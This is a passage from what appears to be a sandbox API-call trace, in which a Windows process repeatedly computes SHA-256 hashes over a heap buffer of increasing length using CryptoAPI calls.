[0189.617] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acda70 [0189.617] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32acda70, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acda70, pdwDataLen=0xce12c) returned 1 [0189.617] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0189.617] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0189.617] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338232d0) returned 1 [0189.618] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.618] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0xdc0, dwFlags=0x0) returned 1 [0189.618] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.618] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acdda0 [0189.618] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x2, pbData=0x32acdda0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acdda0, pdwDataLen=0xce12c) returned 1 [0189.618] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0189.618] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0189.618] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338222d0) returned 1 [0189.618] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.618] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0xde0, dwFlags=0x0) returned 1 [0189.618] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.618] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acdc50 [0189.618] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32acdc50, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acdc50, pdwDataLen=0xce12c) returned 1 [0189.618] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0189.618] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0189.618] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338235d0) returned 1 [0189.619] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.619] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0xe00, dwFlags=0x0) returned 1 [0189.619] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.619] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acde90 [0189.619] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x2, pbData=0x32acde90, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acde90, pdwDataLen=0xce12c) returned 1 [0189.619] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.619] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0189.619] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338235d0) returned 1 [0189.620] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.620] CryptHashData (hHash=0x3396ee10, pbData=0x32348160, dwDataLen=0xe20, dwFlags=0x0) returned 1 [0189.620] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.620] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acdad0 [0189.620] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x2, pbData=0x32acdad0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acdad0, pdwDataLen=0xce12c) returned 1 [0189.620] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0189.620] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0189.620] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822bd0) returned 1 [0189.620] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.620] CryptHashData (hHash=0x3396f120, pbData=0x32348160, dwDataLen=0xe40, dwFlags=0x0) returned 1 [0189.620] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.620] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace220 [0189.620] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x2, pbData=0x32ace220, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32ace220, pdwDataLen=0xce12c) returned 1 [0189.621] CryptDestroyHash (hHash=0x3396f120) returned 1 [0189.621] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0189.621] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338230d0) returned 1 [0189.621] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.621] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0xe60, dwFlags=0x0) returned 1 [0189.621] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.621] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acdfb0 [0189.621] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x2, pbData=0x32acdfb0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acdfb0, pdwDataLen=0xce12c) returned 1 [0189.621] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0189.621] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0189.621] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822ad0) returned 1 [0189.622] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.622] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0xe80, dwFlags=0x0) returned 1 [0189.622] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.622] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd8f0 [0189.622] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32acd8f0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd8f0, pdwDataLen=0xce12c) returned 1 [0189.622] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0189.622] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0189.622] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338225d0) returned 1 [0189.623] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.623] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0xea0, dwFlags=0x0) returned 1 [0189.623] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.623] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd860 [0189.623] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x2, pbData=0x32acd860, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd860, pdwDataLen=0xce12c) returned 1 [0189.623] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0189.623] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0189.623] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338228d0) returned 1 [0189.623] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.623] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0xec0, dwFlags=0x0) returned 1 [0189.624] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.624] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acdce0 [0189.624] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x2, pbData=0x32acdce0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acdce0, pdwDataLen=0xce12c) returned 1 [0189.624] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.624] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0189.624] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338225d0) returned 1 [0189.624] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.624] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0xee0, dwFlags=0x0) returned 1 [0189.624] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.624] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acdd70 [0189.624] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32acdd70, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acdd70, pdwDataLen=0xce12c) returned 1 [0189.624] CryptDestroyHash (hHash=0x3396f430) returned 1 [0189.624] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0189.624] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338223d0) returned 1 [0189.625] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.625] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0xf00, dwFlags=0x0) returned 1 [0189.625] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.625] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace2e0 [0189.625] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x2, pbData=0x32ace2e0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32ace2e0, pdwDataLen=0xce12c) returned 1 [0189.625] CryptDestroyHash (hHash=0x3396f660) returned 1 [0189.625] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0189.625] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338239d0) returned 1 [0189.626] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.626] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0xf20, dwFlags=0x0) returned 1 [0189.626] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.636] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acde60 [0189.636] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x2, pbData=0x32acde60, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acde60, pdwDataLen=0xce12c) returned 1 [0189.636] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0189.636] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0189.636] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338236d0) returned 1 [0189.637] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.637] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0xf40, dwFlags=0x0) returned 1 [0189.637] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.637] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acddd0 [0189.637] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32acddd0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acddd0, pdwDataLen=0xce12c) returned 1 [0189.637] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0189.637] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0189.637] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822cd0) returned 1 [0189.637] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.637] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0xf60, dwFlags=0x0) returned 1 [0189.637] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.637] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd770 [0189.637] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32acd770, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd770, pdwDataLen=0xce12c) returned 1 [0189.638] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0189.638] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0189.638] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338233d0) returned 1 [0189.638] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.638] CryptHashData (hHash=0x3396f350, pbData=0x32348160, dwDataLen=0xf80, dwFlags=0x0) returned 1 [0189.638] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.638] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd8c0 [0189.638] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32acd8c0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd8c0, pdwDataLen=0xce12c) returned 1 [0189.638] CryptDestroyHash (hHash=0x3396f350) returned 1 [0189.638] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0189.638] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33821fd0) returned 1 [0189.639] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.639] CryptHashData (hHash=0x3396f350, pbData=0x32348160, dwDataLen=0xfa0, dwFlags=0x0) returned 1 [0189.639] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.639] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acdf80 [0189.639] CryptDestroyHash (hHash=0x3396f350) returned 1 [0189.639] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0189.639] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822cd0) returned 1 [0189.640] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.640] CryptHashData (hHash=0x3396ee10, pbData=0x32348160, dwDataLen=0xfc0, dwFlags=0x0) returned 1 [0189.640] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acda40 [0189.640] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0189.640] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0189.640] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338228d0) returned 1 [0189.641] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.641] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0xfe0, dwFlags=0x0) returned 1 [0189.641] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace1f0 [0189.641] CryptDestroyHash (hHash=0x3396f430) returned 1 [0189.641] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0189.641] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338234d0) returned 1 [0189.641] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.641] CryptHashData (hHash=0x3396f350, pbData=0x32348160, dwDataLen=0x1000, dwFlags=0x0) returned 1 [0189.641] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acde00 [0189.643] CryptDestroyHash (hHash=0x3396f350) returned 1 [0189.643] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0189.643] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32348160 | out: hHeap=0x2150000) returned 1 [0189.643] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x1000) returned 0x32348160 [0189.643] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822dd0) returned 1 [0189.644] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.644] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x20, dwFlags=0x0) returned 1 [0189.644] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acdfe0 [0189.644] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0189.644] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0189.644] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338239d0) returned 1 [0189.644] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.644] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0x40, dwFlags=0x0) returned 1 [0189.644] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acdd10 [0189.644] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0189.644] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0189.645] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338225d0) returned 1 [0189.645] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.645] CryptHashData (hHash=0x3396ee80, pbData=0x32348160, dwDataLen=0x60, dwFlags=0x0) returned 1 [0189.645] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acdaa0 [0189.645] CryptDestroyHash (hHash=0x3396ee80) returned 1 [0189.645] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0189.645] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822dd0) returned 1 [0189.646] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.646] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0x80, dwFlags=0x0) returned 1 [0189.646] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace310 [0189.646] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0189.646] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0189.646] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338226d0) returned 1 [0189.646] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.646] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0189.646] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acdec0 [0189.646] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0189.647] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0189.647] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338220d0) returned 1 [0189.647] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.647] CryptHashData (hHash=0x3396efd0, pbData=0x32348160, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0189.647] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acdb00 [0189.647] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0189.647] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0189.647] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338225d0) returned 1 [0189.648] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.648] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0189.648] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acdb30 [0189.648] CryptDestroyHash (hHash=0x3396f660) returned 1 [0189.648] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0189.648] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338227d0) returned 1 [0189.648] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.648] CryptHashData (hHash=0x3396f5f0, pbData=0x32348160, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.648] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acdcb0 [0189.649] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0189.649] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0189.649] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338227d0) returned 1 [0189.656] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.656] CryptHashData (hHash=0x3396ea90, pbData=0x32348160, dwDataLen=0x120, dwFlags=0x0) returned 1 [0189.656] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acdb60 [0189.657] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0189.657] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0189.657] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822bd0) returned 1 [0189.657] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.657] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0x140, dwFlags=0x0) returned 1 [0189.658] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acdb90 [0189.658] CryptDestroyHash (hHash=0x3396f430) returned 1 [0189.658] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0189.658] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338220d0) returned 1 [0189.658] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.658] CryptHashData (hHash=0x3396f350, pbData=0x32348160, dwDataLen=0x160, dwFlags=0x0) returned 1 [0189.658] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acdef0 [0189.658] CryptDestroyHash (hHash=0x3396f350) returned 1 [0189.658] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0189.658] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338237d0) returned 1 [0189.659] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.659] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0x180, dwFlags=0x0) returned 1 [0189.659] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace010 